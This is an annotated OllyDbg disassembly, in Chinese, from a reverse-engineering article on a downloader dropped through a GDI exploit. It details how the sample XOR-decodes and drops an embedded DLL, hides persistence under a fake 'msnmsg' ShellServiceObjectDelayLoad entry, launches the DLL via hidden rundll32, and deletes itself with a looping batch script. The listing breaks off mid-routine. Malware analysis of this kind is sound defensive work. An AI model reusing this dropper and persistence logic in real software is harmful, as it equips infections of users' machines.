【文章标题】一个被Gdi漏洞利用后的下载者分析
【文章作者】KuNgBiM/[CCG]
【注意】断网调试
【工具】OD
原始样本下载:http://bbs.pediy.com/showthread.php?t=73885
00401414 >/$ 55 push ebp ; OEP — MSVC CRT startup (WinMainCRTStartup-style): builds the SEH frame, initialises the runtime, parses the command line and calls WinMain at 0040132E
00401415 |. 8BEC mov ebp,esp
00401417 |. 6A FF push -1 ; SEH: initial trylevel = -1
00401419 |. 68 18224000 push update_.00402218 ; SEH: scope table
0040141E |. 68 FC134000 push <jmp.&MSVCRT._except_handler3> ; SEH: handler (_except_handler3)
00401423 |. 64:A1 00000000 mov eax,dword ptr fs:[0]
00401429 |. 50 push eax ; link the previous EXCEPTION_REGISTRATION
0040142A |. 64:8925 00000000 mov dword ptr fs:[0],esp ; fs:[0] = this frame
00401431 |. 83EC 68 sub esp,68 ; locals: argc/argv/envp, STARTUPINFOA, saved esp
00401434 |. 53 push ebx
00401435 |. 56 push esi
00401436 |. 57 push edi
00401437 |. 8965 E8 mov [local.6],esp ; saved esp for the exception handler
0040143A |. 33DB xor ebx,ebx ; ebx = 0 for the rest of the function
0040143C |. 895D FC mov [local.1],ebx ; trylevel = 0
0040143F |. 6A 02 push 2 ; 2 = _GUI_APP
00401441 |. FF15 5C204000 call dword ptr ds:[<&MSVCRT.__set_app_type>] ; MSVCRT.__set_app_type
00401447 |. 59 pop ecx
00401448 |. 830D 306E4000 FF or dword ptr ds:[406E30],FFFFFFFF ; two CRT globals set to -1 (standard crt0 init; their names are not recoverable from this listing)
0040144F |. 830D 346E4000 FF or dword ptr ds:[406E34],FFFFFFFF
00401456 |. FF15 64204000 call dword ptr ds:[<&MSVCRT.__p__fmode>] ; MSVCRT.__p__fmode
0040145C |. 8B0D 2C6E4000 mov ecx,dword ptr ds:[406E2C]
00401462 |. 8908 mov dword ptr ds:[eax],ecx ; *__p__fmode() = [406E2C]
00401464 |. FF15 98204000 call dword ptr ds:[<&MSVCRT.__p__commode>] ; MSVCRT.__p__commode
0040146A |. 8B0D 286E4000 mov ecx,dword ptr ds:[406E28]
00401470 |. 8908 mov dword ptr ds:[eax],ecx ; *__p__commode() = [406E28]
00401472 |. A1 68204000 mov eax,dword ptr ds:[<&MSVCRT._adjust_fdiv>]
00401477 |. 8B00 mov eax,dword ptr ds:[eax]
00401479 |. A3 386E4000 mov dword ptr ds:[406E38],eax ; local copy of _adjust_fdiv
0040147E |. E8 10010000 call update_.00401593 ; CRT init helper (body not shown in this listing)
00401483 |. 391D 186E4000 cmp dword ptr ds:[406E18],ebx
00401489 |. 75 0C jnz short update_.00401497 ; if [406E18] == 0 install the default _matherr hook
0040148B |. 68 90154000 push update_.00401590
00401490 |. FF15 6C204000 call dword ptr ds:[<&MSVCRT.__setusermatherr>] ; MSVCRT.__setusermatherr
00401496 |. 59 pop ecx
00401497 |> E8 E2000000 call update_.0040157E ; CRT init helper (body not shown in this listing)
0040149C |. 68 0C304000 push update_.0040300C ; end of initializer table
004014A1 |. 68 08304000 push update_.00403008 ; start of initializer table
004014A6 |. E8 CD000000 call <jmp.&MSVCRT._initterm> ; run C initializers
004014AB |. A1 246E4000 mov eax,dword ptr ds:[406E24]
004014B0 |. 8945 94 mov [local.27],eax ; presumably the _startupinfo (newmode) passed to __getmainargs
004014B3 |. 8D45 94 lea eax,[local.27]
004014B6 |. 50 push eax ; &startinfo
004014B7 |. FF35 206E4000 push dword ptr ds:[406E20] ; dowildcard
004014BD |. 8D45 9C lea eax,[local.25]
004014C0 |. 50 push eax ; &envp
004014C1 |. 8D45 90 lea eax,[local.28]
004014C4 |. 50 push eax ; &argv
004014C5 |. 8D45 A0 lea eax,[local.24]
004014C8 |. 50 push eax ; &argc
004014C9 |. FF15 74204000 call dword ptr ds:[<&MSVCRT.__getmainargs>] ; MSVCRT.__getmainargs
004014CF |. 68 04304000 push update_.00403004 ; end of initializer table
004014D4 |. 68 00304000 push update_.00403000 ; start of initializer table
004014D9 |. E8 9A000000 call <jmp.&MSVCRT._initterm> ; run C++ constructors
004014DE |. 83C4 24 add esp,24 ; pop both _initterm calls (0x10) and __getmainargs (0x14)
004014E1 |. A1 78204000 mov eax,dword ptr ds:[<&MSVCRT._acmdln>]
004014E6 |. 8B30 mov esi,dword ptr ds:[eax] ; esi = raw command line
004014E8 |. 8975 8C mov [local.29],esi
004014EB |. 803E 22 cmp byte ptr ds:[esi],22 ; program name quoted?
004014EE |. 75 3A jnz short update_.0040152A ; no: skip up to the first whitespace instead
004014F0 |> 46 /inc esi ; quoted: advance to the closing quote or NUL
004014F1 |. 8975 8C |mov [local.29],esi
004014F4 |. 8A06 |mov al,byte ptr ds:[esi]
004014F6 |. 3AC3 |cmp al,bl ; NUL?
004014F8 |. 74 04 |je short update_.004014FE
004014FA |. 3C 22 |cmp al,22 ; closing quote?
004014FC |.^ 75 F2 \jnz short update_.004014F0
004014FE |> 803E 22 cmp byte ptr ds:[esi],22
00401501 |. 75 04 jnz short update_.00401507
00401503 |> 46 inc esi ; step past the quote / one whitespace byte
00401504 |. 8975 8C mov [local.29],esi
00401507 |> 8A06 mov al,byte ptr ds:[esi] ; skip whitespace (any byte <= 0x20) before the arguments
00401509 |. 3AC3 cmp al,bl
0040150B |. 74 04 je short update_.00401511
0040150D |. 3C 20 cmp al,20
0040150F |.^ 76 F2 jbe short update_.00401503
00401511 |> 895D D0 mov [local.12],ebx ; STARTUPINFOA.dwFlags = 0
00401514 |. 8D45 A4 lea eax,[local.23] ; local.23 = STARTUPINFOA (0x44 bytes)
00401517 |. 50 push eax ; /pStartupinfo
00401518 |. FF15 38204000 call dword ptr ds:[<&KERNEL32.GetStartupInfoA>] ; \GetStartupInfoA
0040151E |. F645 D0 01 test byte ptr ss:[ebp-30],1 ; dwFlags & STARTF_USESHOWWINDOW ?
00401522 |. 74 11 je short update_.00401535
00401524 |. 0FB745 D4 movzx eax,word ptr ss:[ebp-2C] ; nCmdShow = wShowWindow
00401528 |. EB 0E jmp short update_.00401538
0040152A |> 803E 20 /cmp byte ptr ds:[esi],20 ; unquoted: skip until whitespace or NUL
0040152D |.^ 76 D8 |jbe short update_.00401507
0040152F |. 46 |inc esi
00401530 |. 8975 8C |mov [local.29],esi
00401533 |.^ EB F5 \jmp short update_.0040152A
00401535 |> 6A 0A push 0A ; nCmdShow = 0x0A (SW_SHOWDEFAULT)
00401537 |. 58 pop eax
00401538 |> 50 push eax ; /Arg4 = nCmdShow
00401539 |. 56 push esi ; |Arg3 = lpCmdLine (program name skipped)
0040153A |. 53 push ebx ; |Arg2 = hPrevInstance = NULL
0040153B |. 53 push ebx ; |/pModule = NULL
0040153C |. FF15 1C204000 call dword ptr ds:[<&KERNEL32.GetModuleHandleA>] ; |\GetModuleHandleA
00401542 |. 50 push eax ; |Arg1 = hInstance
00401543 |. E8 E6FDFFFF call update_.0040132E ; \WinMain — all malicious behaviour starts here (expanded below)
{ // call 0040132E
0040132E /$ 55 push ebp ; WinMain(hInstance, hPrev, lpCmdLine, nCmdShow), stdcall (retn 10 at 004013F9). Flow: clean old SSODL values -> check infection-marker mutex -> drop DLL -> register persistence -> load DLL via rundll32 -> self-delete
0040132F |. 8BEC mov ebp,esp
00401331 |. 81EC 04010000 sub esp,104 ; local.65 = 0x104-byte path buffer (MAX_PATH)
00401337 |. E8 A7FFFFFF call update_.004012E3 ; delete stale "JavaView"/"DesktopWin" values under ShellServiceObjectDelayLoad (expanded below)
{ // call 004012E3
004012E3 /$ 55 push ebp ; Delete the "JavaView" and "DesktopWin" values under HKLM\...\ShellServiceObjectDelayLoad (presumably names used by earlier variants). This function adds nothing; the new SSODL entry is written later by 0040108B
004012E4 |. 8BEC mov ebp,esp
004012E6 |. 51 push ecx ; local.1 = HKEY
004012E7 |. 8D45 FC lea eax,[local.1]
004012EA |. 50 push eax ; /pHandle
004012EB |. 68 3F000F00 push 0F003F ; |Access = KEY_ALL_ACCESS
004012F0 |. 6A 00 push 0 ; |Reserved = 0
004012F2 |. FF35 146E4000 push dword ptr ds:[406E14] ; |Subkey = "Software\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad"
004012F8 |. 68 02000080 push 80000002 ; |hKey = HKEY_LOCAL_MACHINE
004012FD |. FF15 08204000 call dword ptr ds:[<&ADVAPI32.RegOpenKeyExA>] ; \RegOpenKeyExA — KEY_ALL_ACCESS on HKLM typically requires an administrative account
00401303 |. 85C0 test eax,eax
00401305 |. 75 25 jnz short update_.0040132C ; open failed -> return without touching the registry
00401307 |. 56 push esi
00401308 |. 8B35 04204000 mov esi,dword ptr ds:[<&ADVAPI32.RegDeleteValueA>] ; ADVAPI32.RegDeleteValueA
0040130E |. 68 CC214000 push update_.004021CC ; /ValueName = "JavaView"
00401313 |. FF75 FC push [local.1] ; |hKey
00401316 |. FFD6 call esi ; \RegDeleteValueA — result ignored (the value may not exist)
00401318 |. 68 C0214000 push update_.004021C0 ; /ValueName = "DesktopWin"
0040131D |. FF75 FC push [local.1] ; |hKey
00401320 |. FFD6 call esi ; \RegDeleteValueA — result ignored
00401322 |. FF75 FC push [local.1] ; /hKey
00401325 |. FF15 0C204000 call dword ptr ds:[<&ADVAPI32.RegCloseKey>] ; \RegCloseKey
0040132B |. 5E pop esi
0040132C |> C9 leave
0040132D \. C3 retn ; the caller does not use the return value
}
0040133C |. 68 FC214000 push update_.004021FC ; /Name = "__DL_CORE4GAEX_MUTEX__" (infection marker)
00401341 |. 6A 00 push 0 ; |Inheritable = FALSE
00401343 |. 6A 01 push 1 ; |Access = 1 (MUTEX_MODIFY_STATE)
00401345 |. FF15 50204000 call dword ptr ds:[<&KERNEL32.OpenMutexA>] ; \OpenMutexA — opens only; nothing in this EXE creates the mutex, presumably the dropped DLL does
0040134B |. 85C0 test eax,eax
0040134D |. 0F85 97000000 jnz update_.004013EA ; mutex exists -> already installed: close the handle and go straight to self-delete (no DLL drop)
00401353 |. 56 push esi ; not installed yet: drop and register the DLL
00401354 |. 68 04010000 push 104 ; /BufSize = 0x104 (MAX_PATH)
00401359 |. 8D85 FCFEFFFF lea eax,[local.65] ; |
0040135F |. 50 push eax ; |Buffer
00401360 |. FF15 20204000 call dword ptr ds:[<&KERNEL32.GetWindowsDirectoryA>] ; \GetWindowsDirectoryA (e.g. "C:\WINDOWS") — used only to learn the system drive
00401366 |. 8B35 24204000 mov esi,dword ptr ds:[<&KERNEL32.lstrcatA>] ; kernel32.lstrcatA
0040136C |. 68 E4214000 push update_.004021E4 ; /"Program Files\Messenger" (OllyDbg also shows the adjacent mutex string)
00401371 |. 8D85 FCFEFFFF lea eax,[local.65] ; |
00401377 |. 50 push eax ; |ConcatString
00401378 |. C685 FFFEFFFF 00 mov byte ptr ss:[ebp-101],0 ; |buffer[3] = 0: truncate "C:\WINDOWS" to the drive root "C:\"
0040137F |. FFD6 call esi ; \lstrcatA -> "C:\Program Files\Messenger"
00401381 |. 8D85 FCFEFFFF lea eax,[local.65]
00401387 |. 50 push eax ; /FileName
00401388 |. FF15 28204000 call dword ptr ds:[<&KERNEL32.GetFileAttributesA>] ; \GetFileAttributesA
0040138E |. 83F8 10 cmp eax,10 ; attributes == FILE_ATTRIBUTE_DIRECTORY exactly? (not a count; any extra attribute bit re-runs CreateDirectoryA, which then simply fails)
00401391 |. 74 0F je short update_.004013A2
00401393 |. 6A 00 push 0 ; /pSecurity = NULL
00401395 |. 8D85 FCFEFFFF lea eax,[local.65] ; |
0040139B |. 50 push eax ; |Path
0040139C |. FF15 2C204000 call dword ptr ds:[<&KERNEL32.CreateDirectoryA>] ; \CreateDirectoryA — return value unchecked
004013A2 |> 68 D8214000 push update_.004021D8 ; /"\msgmr.dll" -> drop path "C:\Program Files\Messenger\msgmr.dll"
004013A7 |. 8D85 FCFEFFFF lea eax,[local.65]
004013AD |. 50 push eax ; |ConcatString
004013AE |. FFD6 call esi ; \lstrcatA
004013B0 |. 8D85 FCFEFFFF lea eax,[local.65]
004013B6 |. 50 push eax ; arg.1 = drop path
004013B7 |. E8 44FCFFFF call update_.00401000 ; XOR-decode the embedded DLL and write it to that path (expanded below)
{ // call 00401000
00401000 $ 6A 10 push 10 ; sub_401000(char *path): decode the embedded DLL image in place and write it to `path`. Returns 1 on success, 0 if CreateFileA fails. cdecl (caller pops the argument)
00401002 . 68 F0204000 push update_.004020F0 ; SEH scope table
00401007 . E8 9C050000 call update_.004015A8 ; presumably MSVC __SEH_prolog: sets up ebp, 0x10 bytes of locals and the handler
0040100C . 33F6 xor esi,esi ; esi = 0 (reused as NULL/0 arguments below)
0040100E . 8975 FC mov dword ptr ss:[ebp-4],esi ; trylevel = 0
00401011 . 8975 E4 mov dword ptr ss:[ebp-1C],esi ; i = 0
00401014 > 817D E4 00090000 cmp dword ptr ss:[ebp-1C],900 ; loop i in [0, 0x900): only the first 2304 bytes of the image are obfuscated
0040101B . 73 17 jnb short update_.00401034
0040101D . 8B45 E4 mov eax,dword ptr ss:[ebp-1C]
00401020 . 8D80 10304000 lea eax,dword ptr ds:[eax+403010] ; eax = &image[i]; the embedded DLL starts at 00403010 and is patched in place
00401026 . 33C9 xor ecx,ecx
00401028 . 8A08 mov cl,byte ptr ds:[eax]
0040102A . 83F1 3A xor ecx,3A ; single-byte XOR key 0x3A
0040102D . 8808 mov byte ptr ds:[eax],cl ; image[i] ^= 0x3A
0040102F . FF45 E4 inc dword ptr ss:[ebp-1C] ; i++
00401032 .^ EB E0 jmp short update_.00401014
00401034 > 56 push esi ; /hTemplateFile = NULL
00401035 . 56 push esi ; |Attributes = 0
00401036 . 6A 02 push 2 ; |Mode = CREATE_ALWAYS (overwrites an existing file at `path`)
00401038 . 56 push esi ; |pSecurity = NULL
00401039 . 56 push esi ; |ShareMode = 0
0040103A . 68 00000040 push 40000000 ; |Access = GENERIC_WRITE
0040103F . FF75 08 push dword ptr ss:[ebp+8] ; |FileName = `path`
00401042 . FF15 48204000 call dword ptr ds:[<&KERNEL32.CreateFileA>] ; \CreateFileA
00401048 . 8BF8 mov edi,eax
0040104A . 897D E0 mov dword ptr ss:[ebp-20],edi ; hFile
0040104D . 83FF FF cmp edi,-1 ; INVALID_HANDLE_VALUE?
00401050 . 74 2D je short update_.0040107F ; -> return 0
00401052 . 56 push esi ; /pOverlapped = NULL
00401053 . 8D45 E4 lea eax,dword ptr ss:[ebp-1C] ; |the loop-counter slot is reused for BytesWritten
00401056 . 50 push eax ; |pBytesWritten
00401057 . 68 003E0000 push 3E00 ; |nBytesToWrite = 0x3E00 (15872): the whole image; bytes 0x900..0x3DFF are written unmodified
0040105C . 68 10304000 push update_.00403010 ; |Buffer = embedded image
00401061 . 57 push edi ; |hFile
00401062 . FF15 4C204000 call dword ptr ds:[<&KERNEL32.WriteFile>] ; \WriteFile — result and byte count unchecked
00401068 . 57 push edi ; /hObject
00401069 . FF15 54204000 call dword ptr ds:[<&KERNEL32.CloseHandle>] ; \CloseHandle
0040106F . 834D FC FF or dword ptr ss:[ebp-4],FFFFFFFF ; trylevel = -1 (leave the __try block)
00401073 . 33C0 xor eax,eax
00401075 . 40 inc eax ; return 1
00401076 . EB 0D jmp short update_.00401085
00401078 . 33C0 xor eax,eax ; SEH filter stub: returns 1 (EXCEPTION_EXECUTE_HANDLER); reached only through the exception dispatcher
0040107A . 40 inc eax
0040107B . C3 retn
0040107C . 8B65 E8 mov esp,dword ptr ss:[ebp-18] ; SEH handler: restore esp, then fall into the failure return
0040107F > 834D FC FF or dword ptr ss:[ebp-4],FFFFFFFF ; trylevel = -1
00401083 . 33C0 xor eax,eax ; return 0
00401085 > E8 59050000 call update_.004015E3 ; presumably __SEH_epilog: uninstall the handler and restore the frame
0040108A . C3 retn
}
004013BC |. 59 pop ecx ; cdecl cleanup for 00401000; its 0/1 result is ignored
004013BD |. 8D85 FCFEFFFF lea eax,[local.65] ; path of the dropped DLL
004013C3 |. 50 push eax ; /String
004013C4 |. FF15 44204000 call dword ptr ds:[<&KERNEL32.lstrlenA>] ; \lstrlenA
004013CA |. 40 inc eax ; length including the NUL
004013CB |. 50 push eax ; arg.2 = length
004013CC |. 8D85 FCFEFFFF lea eax,[local.65]
004013D2 |. 50 push eax ; arg.1 = DLL path
004013D3 |. E8 B3FCFFFF call update_.0040108B ; persistence: register the DLL as a COM server and list its CLSID under ShellServiceObjectDelayLoad (expanded below)
{ // call 0040108B
0040108B /$ 55 push ebp ; sub_40108B(char *dllPath, int len): persistence. (1) HKCR\CLSID\{da191de0-aa86-4ed0-4b87-293d48b2ae99}\InprocServer32: (Default) = dllPath, ThreadingModel = "Apartment". (2) HKLM\...\ShellServiceObjectDelayLoad\msnmsg = that CLSID string, so explorer.exe loads the DLL at every shell start. cdecl; the caller ignores the return value
0040108C |. 8BEC mov ebp,esp
0040108E |. 81EC 40010000 sub esp,140 ; local.80 = subkey buffer, local.15 = CLSID string, local.4 = "Apartment", local.1 = HKEY, local.5 = disposition
00401094 |. 56 push esi
00401095 |. 57 push edi
00401096 |. BE 54214000 mov esi,update_.00402154 ; "Apartment" (10 bytes including NUL)
0040109B |. 8D7D F0 lea edi,[local.4]
0040109E |. A5 movsd
0040109F |. A5 movsd
004010A0 |. 66:A5 movsw ; 4+4+2 = 10 bytes copied
004010A2 |. 6A 09 push 9
004010A4 |. 59 pop ecx ; ecx = 9 dwords
004010A5 |. BE 2C214000 mov esi,update_.0040212C ; "{da191de0-aa86-4ed0-4b87-293d48b2ae99}" (39 bytes including NUL)
004010AA |. 8D7D C4 lea edi,[local.15]
004010AD |. F3:A5 rep movsd ; 36 bytes …
004010AF |. 8D45 C4 lea eax,[local.15]
004010B2 |. 50 push eax ; /<%s> = CLSID string
004010B3 |. 66:A5 movsw ; |… +2 bytes …
004010B5 |. 8D85 C0FEFFFF lea eax,[local.80] ; |
004010BB |. 68 14214000 push update_.00402114 ; |format "CLSID\%s\InprocServer32" (OllyDbg also shows the adjacent CLSID string)
004010C0 |. 50 push eax ; |s
004010C1 |. A4 movsb ; |… +1 byte = 39; the string copy is interleaved with the sprintf argument pushes
004010C2 |. E8 3B030000 call <jmp.&MSVCRT.sprintf> ; \sprintf -> "CLSID\{da191de0-...}\InprocServer32"
004010C7 |. 83C4 0C add esp,0C
004010CA |. 8D45 EC lea eax,[local.5]
004010CD |. 50 push eax ; /pDisposition
004010CE |. 8D45 FC lea eax,[local.1] ; |
004010D1 |. 50 push eax ; |pHandle
004010D2 |. 33FF xor edi,edi ; |edi = 0 for the NULL/0 arguments below
004010D4 |. 57 push edi ; |pSecurity => NULL
004010D5 |. 68 3F000F00 push 0F003F ; |Access = KEY_ALL_ACCESS
004010DA |. 57 push edi ; |Options => REG_OPTION_NON_VOLATILE
004010DB |. 57 push edi ; |Class => NULL
004010DC |. 57 push edi ; |Reserved => 0
004010DD |. 8D85 C0FEFFFF lea eax,[local.80] ; |
004010E3 |. 50 push eax ; |Subkey
004010E4 |. 68 00000080 push 80000000 ; |hKey = HKEY_CLASSES_ROOT
004010E9 |. FF15 14204000 call dword ptr ds:[<&ADVAPI32.RegCreateKeyExA>] ; \RegCreateKeyExA
004010EF |. 85C0 test eax,eax
004010F1 |. 0F85 83000000 jnz update_.0040117A ; failed -> return (ebx not pushed yet, so the exit path skips pop ebx)
004010F7 |. 53 push ebx
004010F8 |. FF75 0C push [arg.2] ; /Length = len
004010FB |. FF75 08 push [arg.1] ; |Value = dllPath
004010FE |. 6A 01 push 1 ; |ValueType = REG_SZ
00401100 |. 57 push edi ; |Subkey => NULL (sets the key's default value)
00401101 |. FF75 FC push [local.1] ; |hKey
00401104 |. FF15 10204000 call dword ptr ds:[<&ADVAPI32.RegSetValueA>] ; \RegSetValueA — InprocServer32 (Default) = dllPath (OllyDbg's "(initial cpu selection)" label is a mis-resolved import name)
0040110A |. 8B35 44204000 mov esi,dword ptr ds:[<&KERNEL32.lstrlenA>] ; kernel32.lstrlenA
00401110 |. 8D45 F0 lea eax,[local.4]
00401113 |. 50 push eax ; /String = "Apartment"
00401114 |. FFD6 call esi ; \lstrlenA
00401116 |. 40 inc eax ; include the NUL
00401117 |. 50 push eax ; /BufSize
00401118 |. 8D45 F0 lea eax,[local.4] ; |
0040111B |. 50 push eax ; |Buffer = "Apartment"
0040111C |. 6A 01 push 1 ; |ValueType = REG_SZ
0040111E |. 57 push edi ; |Reserved => 0
0040111F |. 8B3D 00204000 mov edi,dword ptr ds:[<&ADVAPI32.RegSetValueExA>] ; |ADVAPI32.RegSetValueExA (edi is no longer 0 from here on)
00401125 |. 68 04214000 push update_.00402104 ; |ValueName = "ThreadingModel"
0040112A |. FF75 FC push [local.1] ; |hKey
0040112D |. FFD7 call edi ; \RegSetValueExA
0040112F |. FF75 FC push [local.1] ; /hKey
00401132 |. 8B1D 0C204000 mov ebx,dword ptr ds:[<&ADVAPI32.RegCloseKey>] ; |ADVAPI32.RegCloseKey
00401138 |. FFD3 call ebx ; \RegCloseKey
0040113A |. 8D45 FC lea eax,[local.1]
0040113D |. 50 push eax ; /pHandle
0040113E |. 68 3F000F00 push 0F003F ; |Access = KEY_ALL_ACCESS
00401143 |. 6A 00 push 0 ; |Reserved = 0
00401145 |. FF35 146E4000 push dword ptr ds:[406E14] ; |Subkey = "Software\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad"
0040114B |. 68 02000080 push 80000002 ; |hKey = HKEY_LOCAL_MACHINE
00401150 |. FF15 08204000 call dword ptr ds:[<&ADVAPI32.RegOpenKeyExA>] ; \RegOpenKeyExA
00401156 |. 85C0 test eax,eax
00401158 |. 75 1F jnz short update_.00401179 ; failed -> return; the CLSID registration above is left in place
0040115A |. 8D45 C4 lea eax,[local.15] ; SSODL entry: explorer.exe instantiates every CLSID listed under this key at shell startup, which loads the DLL into the shell process
0040115D |. 50 push eax ; /String = CLSID string
0040115E |. FFD6 call esi ; \lstrlenA
00401160 |. 40 inc eax ; include the NUL
00401161 |. 50 push eax ; /BufSize
00401162 |. 8D45 C4 lea eax,[local.15] ; |
00401165 |. 50 push eax ; |Buffer = CLSID string
00401166 |. 6A 01 push 1 ; |ValueType = REG_SZ
00401168 |. 6A 00 push 0 ; |Reserved = 0
0040116A |. 68 FC204000 push update_.004020FC ; |ValueName = "msnmsg" — only a label chosen to look legitimate; no MSN process is involved
0040116F |. FF75 FC push [local.1] ; |hKey
00401172 |. FFD7 call edi ; \RegSetValueExA
00401174 |. FF75 FC push [local.1] ; /hKey
00401177 |. FFD3 call ebx ; \RegCloseKey
00401179 |> 5B pop ebx
0040117A |> 5F pop edi
0040117B |. 5E pop esi
0040117C |. C9 leave
0040117D \. C3 retn
}
004013D8 |. 8D85 FCFEFFFF lea eax,[local.65]
004013DE |. 50 push eax ; arg.1 = DLL path
004013DF |. E8 AAFEFFFF call update_.0040128E ; load the DLL immediately: rundll32 "<path>",UIMessage (expanded below)
{ // call 0040128E
0040128E /$ 55 push ebp ; sub_40128E(char *dllPath): load the dropped DLL right away by spawning `rundll32 "<dllPath>",UIMessage` with a hidden window (UIMessage is presumably an export of the DLL). The Explorer-based autoload is configured separately in 0040108B. cdecl; the caller ignores the return value
0040128F |. 8BEC mov ebp,esp
00401291 |. 81EC 54040000 sub esp,454 ; local.277 = command-line buffer, local.17 = STARTUPINFOA, local.21 = PROCESS_INFORMATION
00401297 |. 56 push esi
00401298 |. 8D45 BC lea eax,[local.17]
0040129B |. 50 push eax ; /pStartupinfo
0040129C |. FF15 38204000 call dword ptr ds:[<&KERNEL32.GetStartupInfoA>] ; \GetStartupInfoA — this process's STARTUPINFO is used as the template
004012A2 |. FF75 08 push [arg.1] ; /<%s> = dllPath
004012A5 |. 804D E8 81 or byte ptr ss:[ebp-18],81 ; |si.dwFlags |= 0x81 (STARTF_USESHOWWINDOW | STARTF_FORCEOFFFEEDBACK)
004012A9 |. 8D85 ACFBFFFF lea eax,[local.277] ; |
004012AF |. 68 A8214000 push update_.004021A8 ; |format "rundll32 \"%s\",UIMessage" (OllyDbg also shows the adjacent "DesktopWin" string)
004012B4 |. 33F6 xor esi,esi ; |esi = 0
004012B6 |. 50 push eax ; |s
004012B7 |. 66:8975 EC mov word ptr ss:[ebp-14],si ; |si.wShowWindow = 0 (SW_HIDE): rundll32 runs without a visible window
004012BB |. FF15 A0204000 call dword ptr ds:[<&USER32.wsprintfA>] ; \wsprintfA — the caller's path buffer is 0x104 bytes, so the 0x454-byte buffer is not overrun
004012C1 |. 83C4 0C add esp,0C
004012C4 |. 8D45 AC lea eax,[local.21]
004012C7 |. 50 push eax ; /pProcessInfo
004012C8 |. 8D45 BC lea eax,[local.17] ; |
004012CB |. 50 push eax ; |pStartupInfo
004012CC |. 56 push esi ; |CurrentDir => NULL
004012CD |. 56 push esi ; |pEnvironment => NULL
004012CE |. 56 push esi ; |CreationFlags => 0
004012CF |. 56 push esi ; |InheritHandles => FALSE
004012D0 |. 56 push esi ; |pThreadSecurity => NULL
004012D1 |. 56 push esi ; |pProcessSecurity => NULL
004012D2 |. 8D85 ACFBFFFF lea eax,[local.277] ; |
004012D8 |. 50 push eax ; |CommandLine = "rundll32 ..." — with no lpApplicationName, the bare "rundll32" is resolved through the search path
004012D9 |. 56 push esi ; |ModuleFileName => NULL
004012DA |. FF15 3C204000 call dword ptr ds:[<&KERNEL32.CreateProcessA>] ; \CreateProcessA — result unchecked; the returned process/thread handles are never closed
004012E0 |. 5E pop esi
004012E1 |. C9 leave
004012E2 \. C3 retn
}
004013E4 |. 83C4 0C add esp,0C ; cdecl cleanup: 2 args of 0040108B + 1 arg of 0040128E
004013E7 |. 5E pop esi
004013E8 |. EB 07 jmp short update_.004013F1
004013EA |> 50 push eax ; /hObject = mutex handle (taken only when the mutex already existed)
004013EB |. FF15 54204000 call dword ptr ds:[<&KERNEL32.CloseHandle>] ; \CloseHandle
004013F1 |> E8 88FDFFFF call update_.0040117E ; both paths end here: write a self-delete .bat in the system directory, run it hidden and ExitProcess (expanded below)
{ // call 0040117E
0040117E /$ 55 push ebp ; sub_40117E(): self-delete. Writes "<system dir>\unxxx.bat" that loops `del` on this EXE until it is gone and then deletes the script, runs it hidden and calls ExitProcess(0). Returns 0 only when the .bat could not be created
0040117F |. 8BEC mov ebp,esp
00401181 |. 81EC 6C050000 sub esp,56C ; local.152 = own EXE path, local.217 = system dir, local.87 = .bat path, local.347 = script text (0x208), local.18 = STARTUPINFOA, local.22 = PROCESS_INFORMATION, local.1 = bytes written
00401187 |. 56 push esi
00401188 |. 57 push edi
00401189 |. BF 04010000 mov edi,104 ; edi = MAX_PATH
0040118E |. 57 push edi ; /BufSize => 104 (260.)
0040118F |. 8D85 A0FDFFFF lea eax,[local.152] ; |
00401195 |. 50 push eax ; |PathBuffer
00401196 |. 33F6 xor esi,esi ; |esi = 0
00401198 |. 56 push esi ; |hModule => NULL (the running executable)
00401199 |. FF15 30204000 call dword ptr ds:[<&KERNEL32.GetModuleFileNameA>] ; \GetModuleFileNameA -> full path of this EXE
0040119F |. 57 push edi ; /BufSize => 104 (260.)
004011A0 |. 8D85 9CFCFFFF lea eax,[local.217] ; |
004011A6 |. 50 push eax ; |Buffer
004011A7 |. FF15 34204000 call dword ptr ds:[<&KERNEL32.GetSystemDirectoryA>] ; \GetSystemDirectoryA
004011AD |. 68 9C214000 push update_.0040219C ; /"unxxx.bat"
004011B2 |. 8D85 9CFCFFFF lea eax,[local.217] ; |
004011B8 |. 50 push eax ; |<%s> = system dir
004011B9 |. 8D85 A4FEFFFF lea eax,[local.87] ; |
004011BF |. 68 94214000 push update_.00402194 ; |"%s\%s"
004011C4 |. 50 push eax ; |s
004011C5 |. E8 38020000 call <jmp.&MSVCRT.sprintf> ; \sprintf -> "<system dir>\unxxx.bat" (forensic artifact: the script lives in the system directory until it deletes itself)
004011CA |. 83C4 10 add esp,10
004011CD |. 56 push esi ; /hTemplateFile => NULL
004011CE |. 68 80000000 push 80 ; |Attributes = NORMAL
004011D3 |. 6A 02 push 2 ; |Mode = CREATE_ALWAYS
004011D5 |. 56 push esi ; |pSecurity => NULL
004011D6 |. 6A 02 push 2 ; |ShareMode = FILE_SHARE_WRITE
004011D8 |. 68 00000040 push 40000000 ; |Access = GENERIC_WRITE
004011DD |. 8D85 A4FEFFFF lea eax,[local.87] ; |
004011E3 |. 50 push eax ; |FileName = .bat path
004011E4 |. FF15 48204000 call dword ptr ds:[<&KERNEL32.CreateFileA>] ; \CreateFileA
004011EA |. 8BF8 mov edi,eax
004011EC |. 83FF FF cmp edi,-1 ; INVALID_HANDLE_VALUE?
004011EF |. 0F84 93000000 je update_.00401288 ; -> return 0 (the EXE is then left on disk)
004011F5 |. 68 08020000 push 208 ; /n = 208 (520.)
004011FA |. 8D85 94FAFFFF lea eax,[local.347] ; |
00401200 |. 56 push esi ; |c => 00
00401201 |. 50 push eax ; |s
00401202 |. E8 07020000 call <jmp.&MSVCRT.memset> ; \memset — zero the script buffer
00401207 |. 8D85 A4FEFFFF lea eax,[local.87]
0040120D |. 50 push eax ; /<%s> #3 = .bat path
0040120E |. 8D85 A0FDFFFF lea eax,[local.152] ; |
00401214 |. 50 push eax ; |<%s> #2 = EXE path
00401215 |. 50 push eax ; |<%s> #1 = EXE path
00401216 |. 8D85 94FAFFFF lea eax,[local.347] ; |
0040121C |. 68 60214000 push update_.00402160 ; |:pp\n\ndel "%s"\n\nif exist "%s" goto pp\n\ndel "%s"\n\n — retries until the EXE is unlocked (this process has exited), then removes the script itself
00401221 |. 50 push eax ; |s
00401222 |. E8 DB010000 call <jmp.&MSVCRT.sprintf> ; \sprintf
00401227 |. 83C4 20 add esp,20 ; memset (0xC) + sprintf (0x14)
0040122A |. 56 push esi ; /pOverlapped => NULL
0040122B |. 8D45 FC lea eax,[local.1]
0040122E |. 50 push eax ; |pBytesWritten
